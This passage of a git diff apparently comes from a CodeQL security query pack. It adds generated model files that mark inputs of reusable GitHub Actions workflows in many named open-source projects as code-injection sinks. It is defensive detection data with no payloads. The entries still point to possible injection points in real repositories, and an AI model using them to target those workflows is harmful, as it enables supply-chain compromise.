@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["saadeghi/daisyui/.github/workflows/write-release-notes.yml", "*", "inputs.daisyuiversion", "code-injection", "generated"] + - ["saadeghi/daisyui/.github/workflows/deploy-docs.yml", "*", "inputs.daisyuiversion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml b/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml new file mode 100644 index 00000000000..7ca34fc3e44 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["sagemath/sage/.github/workflows/macos.yml", "*", "inputs.stage", "code-injection", "generated"] + - ["sagemath/sage/.github/workflows/macos.yml", "*", "inputs.targets_optional", "code-injection", "generated"] + - ["sagemath/sage/.github/workflows/macos.yml", "*", "inputs.targets", "code-injection", "generated"] + - ["sagemath/sage/.github/workflows/macos.yml", "*", "inputs.targets_pre", "code-injection", "generated"] + - ["sagemath/sage/.github/workflows/docker_hub.yml", "*", "inputs.dockerhub_repository", "code-injection", "generated"] + - ["sagemath/sage/.github/workflows/docker.yml", "*", "inputs.timeout", "code-injection", "generated"] + - ["sagemath/sage/.github/workflows/docker.yml", "*", "inputs.docker_push_repository", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml b/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml new file mode 100644 index 00000000000..d3cc8e73b70 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["schemastore/schemastore/src/test/github-workflow/reusable-workflow.yaml", "*", "inputs.constraints", "code-injection", "generated"] + - ["schemastore/schemastore/src/negative_test/github-workflow/reusable-workflow-input-must-declare-type.yaml", "*", "inputs.constraints", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml b/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml new file mode 100644 index 00000000000..a9f8401aab2 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["scikit-learn/scikit-learn/.github/workflows/update_tracking_issue.yml", "*", "inputs.job_status", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml b/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml new file mode 100644 index 00000000000..acf43426e56 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["seleniumhq/selenium/.github/workflows/bazel.yml", "*", "inputs.run", "code-injection", "generated"] + - ["seleniumhq/selenium/.github/workflows/bazel.yml", "*", "inputs.ruby-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml new file mode 100644 index 00000000000..3c9178a9125 --- /dev/null 
+++ b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["shaka-project/shaka-packager/.github/workflows/publish-npm.yaml", "*", "inputs.latest", "code-injection", "generated"] + - ["shaka-project/shaka-packager/.github/workflows/publish-npm.yaml", "*", "inputs.tag", "code-injection", "generated"] + - ["shaka-project/shaka-packager/.github/workflows/build.yaml", "*", "inputs.self_hosted", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml new file mode 100644 index 00000000000..24603c25a77 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "inputs.ignore_test_status", "code-injection", "generated"] + - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "inputs.test_filter", "code-injection", "generated"] + - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "inputs.browser_filter", "code-injection", "generated"] + - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "inputs.pr", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml b/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml new file mode 100644 index 00000000000..29f01c24bed --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["shimataro/ssh-key-action/.github/workflows/reusable-verify.yml", "*", "inputs.package_installation_command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml b/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml new file mode 100644 index 00000000000..acad489dbe5 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["softfever/orcaslicer/.github/workflows/build_orca.yml", "*", "inputs.arch", "code-injection", "generated"] + - ["softfever/orcaslicer/.github/workflows/build_deps.yml", "*", "inputs.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml b/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml new file mode 100644 index 00000000000..e15b6d33042 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["software-mansion/react-native-reanimated/.github/workflows/build-npm-package-action.yml", "*", "inputs.option", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml b/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml new file mode 100644 index 00000000000..12c9f97b7a4 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["solana-labs/solana/.github/workflows/release-artifacts.yml", "*", "inputs.commit", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml b/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml new file mode 100644 index 00000000000..685944420aa --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["sonarr/sonarr/.github/workflows/deploy.yml", "*", "inputs.version", "code-injection", "generated"] + - ["sonarr/sonarr/.github/workflows/deploy.yml", "*", "inputs.branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml b/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml new file mode 100644 index 00000000000..884c3d154ad --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["speedb-io/speedb/.github/workflows/build_ubuntu_arm.yml", "*", "inputs.verSion", "code-injection", "generated"] + - ["speedb-io/speedb/.github/workflows/build_macos_ARM.yml", "*", "inputs.verSion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml b/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml new file mode 100644 index 00000000000..799958a7fee --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["spring-cloud/spring-cloud-dataflow/.github/workflows/build-images.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml b/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml new file mode 100644 index 00000000000..32d3e59e1f8 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["sqlfluff/sqlfluff/.github/workflows/ci-test-python.yml", "*", "inputs.marks", "code-injection", "generated"] + - ["sqlfluff/sqlfluff/.github/workflows/ci-test-python.yml", "*", "inputs.python-version", "code-injection", "generated"] + - ["sqlfluff/sqlfluff/.github/workflows/ci-test-dbt.yml", "*", "inputs.dbt-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml b/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml new file mode 100644 index 00000000000..f2893eb2407 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml 
@@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["stdlib-js/stdlib/.github/workflows/update_pr_copyright_years.yml", "*", "inputs.pull_request_number", "code-injection", "generated"] + - ["stdlib-js/stdlib/.github/workflows/lint_autofix.yml", "*", "inputs.pull_request_number", "code-injection", "generated"] + - ["stdlib-js/stdlib/.github/workflows/check_required_files.yml", "*", "inputs.user", "code-injection", "generated"] + - ["stdlib-js/stdlib/.github/workflows/check_required_files.yml", "*", "inputs.pull_request_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml b/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml new file mode 100644 index 00000000000..ea3b2029f82 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["stereokit/stereokit/.github/workflows/build.yml", "*", "inputs.patch", "code-injection", "generated"] + - ["stereokit/stereokit/.github/workflows/build.yml", "*", "inputs.minor", "code-injection", "generated"] + - ["stereokit/stereokit/.github/workflows/build.yml", "*", "inputs.major", "code-injection", "generated"] + - ["stereokit/stereokit/.github/workflows/build.yml", "*", "inputs.preName", "code-injection", "generated"] + - ["stereokit/stereokit/.github/workflows/build.yml", "*", "inputs.pre", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml b/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml new file mode 100644 index 00000000000..74bdcb807c8 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["streetsidesoftware/cspell/.github/workflows/reuseable-pr-from-artifact.yml", "*", "inputs.patch_path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml b/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml new file mode 100644 index 00000000000..4c0442abd2b --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["supabase/auth/.github/workflows/publish.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml new file mode 100644 index 00000000000..39c81d39066 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["supabase/cli/.github/workflows/mirror-image.yml", "*", "inputs.image", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml b/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml new file mode 100644 index 00000000000..82f5ba4be74 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml 
@@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["tencent/hippy/.github/workflows/reuse_get_workflow_output.yml", "*", "inputs.workflow_run", "code-injection", "generated"] + - ["tencent/hippy/.github/workflows/reuse_classify_commits.yml", "*", "inputs.pull_request_number", "code-injection", "generated"] + - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "inputs.pull_request_head_sha", "code-injection", "generated"] + - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "inputs.pull_request_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml b/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml new file mode 100644 index 00000000000..ffb08a8fa2e --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "inputs.map", "code-injection", "generated"] + - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "inputs.minor", "code-injection", "generated"] + - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "inputs.major", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml b/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml new file mode 100644 index 00000000000..4012908e7e9 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["thesofproject/sof/.github/workflows/ipc_fuzzer.yml", "*", "inputs.fuzzing_duration_s", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml b/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml new file mode 100644 index 00000000000..a1af8280ebc --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["tiann/kernelsu/.github/workflows/ksud.yml", "*", "inputs.target", "code-injection", "generated"] + - ["tiann/kernelsu/.github/workflows/avd-kernel.yml", "*", "inputs.manifest_name", "code-injection", "generated"] + - ["tiann/kernelsu/.github/workflows/wsa-kernel.yml", "*", "inputs.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml b/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml new file mode 100644 index 00000000000..84de5681fea --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["tiledb-inc/tiledb/.github/workflows/ci-linux_mac.yml", "*", "inputs.asan", "code-injection", "generated"] + - ["tiledb-inc/tiledb/.github/workflows/append-release-cmake.yml", "*", "inputs.ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml b/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml new file mode 100644 index 00000000000..c9e8b5c23c0 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["toeverything/affine/.github/workflows/build-server-image.yml", "*", "inputs.flavor", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml b/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml new file mode 100644 index 00000000000..80dde7f2fc0 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["tracel-ai/burn/.github/workflows/publish-template.yml", "*", "inputs.crate", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml b/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml new file mode 100644 index 00000000000..1ffaa4e1cd0 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["tribler/tribler/.github/workflows/pytest_custom_ipv8.yml", "*", "inputs.ipv8-git-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml b/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml new file mode 100644 index 00000000000..48b35d83c70 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ubisoft/sharpmake/.github/workflows/build.yml", "*", "inputs.framework", "code-injection", "generated"] + - ["ubisoft/sharpmake/.github/workflows/build.yml", "*", "inputs.configuration", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml b/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml new file mode 100644 index 00000000000..e1a0c8a9fcf --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["unity-technologies/ml-agents/.github/workflows/pytest.yml", "*", "inputs.pytest_markers", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml b/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml new file mode 100644 index 00000000000..71cd3fed3ed --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["urbit/urbit/.github/workflows/shared.yml", "*", "inputs.pace", "code-injection", "generated"] + - ["urbit/urbit/.github/workflows/shared.yml", "*", "inputs.next", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml b/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml new file mode 100644 index 00000000000..47f53f495f8 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["uyuni-project/uyuni/.github/workflows/acceptance_tests_common.yml", "*", "inputs.server_id", "code-injection", "generated"] + - ["uyuni-project/uyuni/.github/workflows/acceptance_tests_common.yml", "*", "inputs.secondary_tests", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml b/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml new file mode 100644 index 00000000000..1b592aa91cc --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["vert-x3/vertx-hazelcast/.github/workflows/it.yml", "*", "inputs.hz", "code-injection", "generated"] + - ["vert-x3/vertx-hazelcast/.github/workflows/ci.yml", "*", "inputs.hz", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml b/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml new file mode 100644 index 00000000000..db4e957a87a --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["vkcom/vkui/.github/workflows/reusable_workflow_test.yml", "*", "inputs.workspace", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml b/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml new file mode 100644 index 00000000000..c3642c84f63 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["walletconnect/web3modal/.github/workflows/ui_tests.yml", "*", "inputs.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml b/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml new file mode 100644 index 00000000000..3e6691f0e8f --- /dev/null 
+++ b/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["warzone2100/warzone2100/.github/workflows/publish_web_build.yml", "*", "inputs.architecture", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml b/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml new file mode 100644 index 00000000000..733c2e20a71 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["wasmedge/wasmedge/.github/workflows/reusable-create-source-tarball.yml", "*", "inputs.version", "code-injection", "generated"] + - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-windows.yml", "*", "inputs.version", "code-injection", "generated"] + - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-windows-msvc.yml", "*", "inputs.version", "code-injection", "generated"] + - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-ubuntu.yml", "*", "inputs.version", "code-injection", "generated"] + - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-manylinux.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml b/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml new file mode 100644 index 00000000000..cb80f74e4e8 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["web-infra-dev/rspack/.github/workflows/reusable-build.yml", "*", "inputs.profile", "code-injection", "generated"] + - ["web-infra-dev/rspack/.github/workflows/reusable-build.yml", "*", "inputs.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml b/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml new file mode 100644 index 00000000000..0f78ea086a6 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml 
@@ -0,0 +1,21 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["werf/werf/.github/workflows/_test_unit.yml", "*", "inputs.excludePackages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_unit.yml", "*", "inputs.packages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_unit.yml", "*", "inputs.coverage", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_integration_regular.yml", "*", "inputs.excludePackages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_integration_regular.yml", "*", "inputs.packages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_integration_regular.yml", "*", "inputs.coverage", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_integration_per-k8s-version.yml", "*", "inputs.coverage", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_integration_per-k8s-version-and-container-registry.yml", "*", "inputs.coverage", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_integration_per-container-registry.yml", "*", "inputs.coverage", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_regular.yml", "*", "inputs.excludePackages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_regular.yml", "*", "inputs.scope", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_regular.yml", "*", "inputs.packages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_regular.yml", "*", "inputs.coverage", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_per-k8s-version.yml", "*", "inputs.excludePackages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_per-k8s-version.yml", "*", "inputs.scope", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_per-k8s-version.yml", "*", 
"inputs.packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml b/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml new file mode 100644 index 00000000000..e2bf8f96fa9 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["widdix/aws-cf-templates/.github/workflows/acceptance-test-run.yml", "*", "inputs.tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml b/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml new file mode 100644 index 00000000000..4a8500a147e --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "inputs.build-arguments", "code-injection", "generated"] + - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "inputs.test-arguments", "code-injection", "generated"] + - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "inputs.maven-repo-path", "code-injection", "generated"] + - ["wildfly/wildfly/.github/workflows/shared-wildfly-build.yml", "*", "inputs.git-log-number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml b/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml new file mode 100644 index 00000000000..3e362cebc58 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml 
